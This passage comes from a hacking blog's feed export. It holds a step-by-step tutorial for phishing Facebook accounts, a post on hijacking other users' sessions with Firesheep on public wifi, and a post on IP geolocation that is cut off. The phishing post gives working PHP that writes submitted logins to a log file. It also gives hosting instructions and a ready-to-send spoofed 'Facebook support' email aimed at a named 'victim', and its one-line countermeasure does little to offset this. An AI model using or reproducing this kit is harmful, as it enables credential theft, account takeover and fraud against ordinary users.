&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=1136095923721146094&amp;amp;postID=7993183182529290803&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;span style=&quot;font-size: small;&quot;&gt;.  &lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivCGBCZ7xhrOgFRgMoOZDHa8T5sLECJoSjmwGuapFuWQfWrUM026ib0-EFCDlnmu1r-ZphnX_K0hsJluVAX0saQ5rsRruJ28W0HIMIMcOWADx-CBMN6j36lRzP-4-7q9Djz5iEsrc9nZx_/s1600/Facebook.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivCGBCZ7xhrOgFRgMoOZDHa8T5sLECJoSjmwGuapFuWQfWrUM026ib0-EFCDlnmu1r-ZphnX_K0hsJluVAX0saQ5rsRruJ28W0HIMIMcOWADx-CBMN6j36lRzP-4-7q9Djz5iEsrc9nZx_/s1600/Facebook.JPG&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;First of all open &lt;a href=&quot;http://www.facebook.com/&quot;&gt;www.facebook.com&lt;/a&gt; in your web browser, from “&lt;i&gt;&lt;u&gt;file&lt;/u&gt;&lt;/i&gt;” menu select “&lt;i&gt;&lt;u&gt;save as&lt;/u&gt;&lt;/i&gt;” and type “&lt;i&gt;&lt;u&gt;Facebook&lt;/u&gt;&lt;/i&gt;” in file name and select “&lt;i&gt;&lt;u&gt;web page complete&lt;/u&gt;&lt;/i&gt;” from save as menu. Once done you will have a file named “&lt;i&gt;&lt;u&gt;Facebook.html&lt;/u&gt;&lt;/i&gt;” and a folder named “&lt;i&gt;&lt;u&gt;Facebook_files&lt;/u&gt;&lt;/i&gt;”. Folder will have several files in it, let them as it is and open &lt;i&gt;&lt;u&gt;Facebook.html&lt;/u&gt;&lt;/i&gt; in notepad or word-pad. From edit menu select &lt;i&gt;&lt;u&gt;&lt;b&gt;find,&lt;/b&gt;&lt;/u&gt;&lt;/i&gt; type &lt;i&gt;&lt;u&gt;&lt;b&gt;action&lt;/b&gt;&lt;/u&gt;&lt;/i&gt; in it and locate following string.&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;action=&quot;https://www.facebook.com/login.php?login_attempt=1&quot; &lt;/b&gt;&lt;/i&gt;&lt;/span&gt; &lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Now replace this string with  &lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;action= “mail.php”&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Now open notepad type following code in it and create mail.php.&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Code:&lt;/span&gt;&lt;/div&gt;&lt;hr /&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;header (&#39;Location: https://www.facebook.com/login.php?login_attempt=1 &#39;);&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;$handle = fopen(&quot;log.txt&quot;, &quot;a&quot;);&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;foreach($_POST as $variable =&amp;gt; $value) {&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;fwrite($handle, $variable);&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;fwrite($handle, &quot;=&quot;);&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;fwrite($handle, $value);&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;fwrite($handle, &quot;\r\n&quot;);&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;}&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;fwrite($handle, &quot;\r\n&quot;);&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;fclose($handle);&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;exit;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;hr /&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Now save it as &lt;i&gt;&lt;b&gt;mail.php&lt;/b&gt;&lt;/i&gt; and create an empty &lt;i&gt;&lt;b&gt;log.txt&lt;/b&gt;&lt;/i&gt; file. Now you&#39;ll need a free web hosting service that supports PHP. Go to &lt;a href=&quot;http://www.100best-free-web-space.com/&quot;&gt;http://www.100best-free-web-space.com/&lt;/a&gt; and select service and plan that suits you. Now in root folder of your website create &lt;i&gt;&lt;span style=&quot;text-decoration: none;&quot;&gt;&lt;b&gt;Facebook_files&lt;/b&gt;&lt;/span&gt;&lt;/i&gt; folder and upload all files in &lt;i&gt;&lt;span style=&quot;text-decoration: none;&quot;&gt;&lt;b&gt;Facebook_files&lt;/b&gt;&lt;/span&gt;&lt;/i&gt; of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make &lt;i&gt;&lt;u&gt;Facebook.html&lt;/u&gt;&lt;/i&gt; your index page and make site live.&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Now sign up with &lt;a href=&quot;http://www.hoaxmail.co.uk/&quot;&gt;http://www.hoaxmail.co.uk/&lt;/a&gt; it provides spoofed email service. Now create a message from support@facebook.com to your victim.&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;hr /&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;u&gt;&lt;b&gt;Sub:&lt;/b&gt;&lt;/u&gt; Invalid activity on your facebook account&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;u&gt;&lt;b&gt;Body:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Dear facebook user (victim&#39;s facebook user name),&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&amp;lt;link to phished site&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you&#39;ll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;support@facebook.com,  &lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Facebook, Inc,&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;1601 S.California Ave&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Palo Alto CA 94394&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;US&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;hr /&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;u&gt;&lt;b&gt;Countermeasure:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;JUSTIFY&quot; style=&quot;margin-bottom: 0in;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/3045068357415030698/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-hack-facbook-account-password-by.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/3045068357415030698'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/3045068357415030698'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-hack-facbook-account-password-by.html' title='How to hack Facbook account password by phishing.'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivCGBCZ7xhrOgFRgMoOZDHa8T5sLECJoSjmwGuapFuWQfWrUM026ib0-EFCDlnmu1r-ZphnX_K0hsJluVAX0saQ5rsRruJ28W0HIMIMcOWADx-CBMN6j36lRzP-4-7q9Djz5iEsrc9nZx_/s72-c/Facebook.JPG" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-2591026633710854337</id><published>2011-05-08T01:25:00.001-07:00</published><updated>2011-05-08T01:25:59.507-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="facebook hacks"/><title type='text'>Firesheep Makes Facebook Hacking Easy</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwYzPp705HBuV3o8iqtvrSb60l-0jS8ltztObJIVt6VN6SzccNGJqcSmS2DLIFm54ge-uFO1f2TI9GjJpXLItsroGL51FEqcSN-9Wb4GHq76lKWBxx1YnAl43wv8YnTThD-8V7NrLq5s/s1600/Firesheep+1.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwYzPp705HBuV3o8iqtvrSb60l-0jS8ltztObJIVt6VN6SzccNGJqcSmS2DLIFm54ge-uFO1f2TI9GjJpXLItsroGL51FEqcSN-9Wb4GHq76lKWBxx1YnAl43wv8YnTThD-8V7NrLq5s/s1600/Firesheep+1.jpeg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://julianhakingarticles.blogspot.com/2011/04/firesheep-makes-facebook-hacking-easy.html&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;b&gt;What is Session Hijacking?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How can a Hacker use Firesheep to Hack a Facebook or any other account?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;b&gt;Public wifi access&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;a href=&quot;http://www.winpcap.org/install/default.htm&quot;&gt;winpcap&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Firesheep(&lt;a href=&quot;http://github.com/downloads/codebutler/firesheep/firesheep-0.1-1.xpi&quot;&gt;Download&lt;/a&gt;)&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;b&gt;Method&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt; First of all download&lt;b&gt; &quot;Firesheep&quot;&lt;/b&gt; from the above link and use the &lt;b&gt;&quot;openwith&quot;&lt;/b&gt; option in the firefox browser&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjanDfeLp5lBUc7CWCjkn4oTbQHviXXd7DH4XdiMVep6_M50p0_Sb06pO1B5_rrRWryjd1MoL2LkYGEObQ216JHt6w0icITzgwpd1bZ23qLVk-v9jtQ5xdcUEoSUrz02Uxvf7OyE2xhMfU/s1600/untitled.bmp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjanDfeLp5lBUc7CWCjkn4oTbQHviXXd7DH4XdiMVep6_M50p0_Sb06pO1B5_rrRWryjd1MoL2LkYGEObQ216JHt6w0icITzgwpd1bZ23qLVk-v9jtQ5xdcUEoSUrz02Uxvf7OyE2xhMfU/s1600/untitled.bmp&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;Once you have installed firesheep on firefox web browser, Click on &lt;b&gt;view&lt;/b&gt; at the top, then goto &lt;b&gt;sidebar&lt;/b&gt; and click on &lt;b&gt;Firesheep&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOUzB4JIEbC67QXQj-S4ULLWpzQ6Dnrnm63-PHdN5QBVlYmv5dBzsUVfJiyScGgRLCIrzfl50g4IPN_cOL2dr8oRxgBU2avbFVkZ0wzKCMJMPw19Iv2TeS6ZvFs1rNAr6uyhiRxGi4sqM/s1600/firesheep+4.bmp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3.&lt;/b&gt; Now click on the top left button &quot;&lt;b&gt;Start capturing&lt;/b&gt;&quot; and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvRMGWSjUg8HWyV30fjvdFmp9OkVPLNtbxaE31nyS1E4ncQt5-brvBu59SETdtyrFQAttEFp9Yhyphenhyphenpeg88DJgdIqBYxfXCz_HNmIwAHV2EvfTMLd4tGFuJo6i0iTDH011rYeFMZXianCeM/s1600/firesheep.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Firesheep&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvRMGWSjUg8HWyV30fjvdFmp9OkVPLNtbxaE31nyS1E4ncQt5-brvBu59SETdtyrFQAttEFp9Yhyphenhyphenpeg88DJgdIqBYxfXCz_HNmIwAHV2EvfTMLd4tGFuJo6i0iTDH011rYeFMZXianCeM/s1600/firesheep.jpg&quot; /&gt;&lt;/a&gt; &lt;/div&gt;&lt;br /&gt;
Hope you liked the post! Pass the comments&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/2591026633710854337/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/firesheep-makes-facebook-hacking-easy.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/2591026633710854337'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/2591026633710854337'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/firesheep-makes-facebook-hacking-easy.html' title='Firesheep Makes Facebook Hacking Easy'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwYzPp705HBuV3o8iqtvrSb60l-0jS8ltztObJIVt6VN6SzccNGJqcSmS2DLIFm54ge-uFO1f2TI9GjJpXLItsroGL51FEqcSN-9Wb4GHq76lKWBxx1YnAl43wv8YnTThD-8V7NrLq5s/s72-c/Firesheep+1.jpeg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-3433935519176861062</id><published>2011-05-08T01:10:00.000-07:00</published><updated>2011-05-08T01:10:07.637-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Trace IP"/><title type='text'>How to Trace Any IP Address</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img alt=&quot;ipmap&quot; class=&quot;alignleft size-full wp-image-1713&quot; height=&quot;180&quot; src=&quot;http://www.gohacking.com/wp-content/uploads/2009/10/ipmap1.jpg&quot; title=&quot;ipmap&quot; width=&quot;283&quot; /&gt;In my earlier post I had discussed about how to capture the IP address&amp;nbsp;of a remote computer. Once you obtain this IP&amp;nbsp;address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Just go to &lt;a href=&quot;http://www.ip2location.com/demo.aspx&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.ip2location.com/demo.aspx&lt;/a&gt;&amp;nbsp;and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.&lt;/div&gt;1. Country in which the IP is located&lt;br /&gt;
2. Region&lt;br /&gt;
3. City&lt;br /&gt;
4. Latitude/Longitude&lt;br /&gt;
5. Zip Code&lt;br /&gt;
6. Time Zone&lt;br /&gt;
7. Name of the ISP&lt;br /&gt;
8. Internet Speed&lt;br /&gt;
9. Weather Station&lt;br /&gt;
10. Area Code and&lt;br /&gt;
11. Domain name associated with the IP address.&lt;br /&gt;
A sample snapshot of the results from ip2location.com is given below&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img alt=&quot;ip2location_results&quot; class=&quot;aligncenter size-full wp-image-1716&quot; height=&quot;123&quot; src=&quot;http://www.gohacking.com/wp-content/uploads/2009/10/ip2location_results1.jpg&quot; title=&quot;ip2location_results&quot; width=&quot;482&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You can also visually trace&amp;nbsp;route any IP address back to it’s location. For this just visit &lt;a href=&quot;http://www.yougetsignal.com/tools/visual-tracert/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.yougetsignal.com/tools/visual-tracert/&lt;/a&gt;&amp;nbsp;and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;center&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; style=&quot;width: 239px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href=&quot;http://www.ip2location.com/&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;14&quot; src=&quot;http://www.ip2location.com/images/searchboxtitle.gif&quot; width=&quot;239&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td align=&quot;center&quot; background=&quot;http://www.ip2location.com/images/searchboxbg.gif&quot; height=&quot;112&quot; valign=&quot;middle&quot; width=&quot;108&quot;&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; height=&quot;112&quot; style=&quot;width: 108px;&quot;&gt;&lt;tbody&gt;
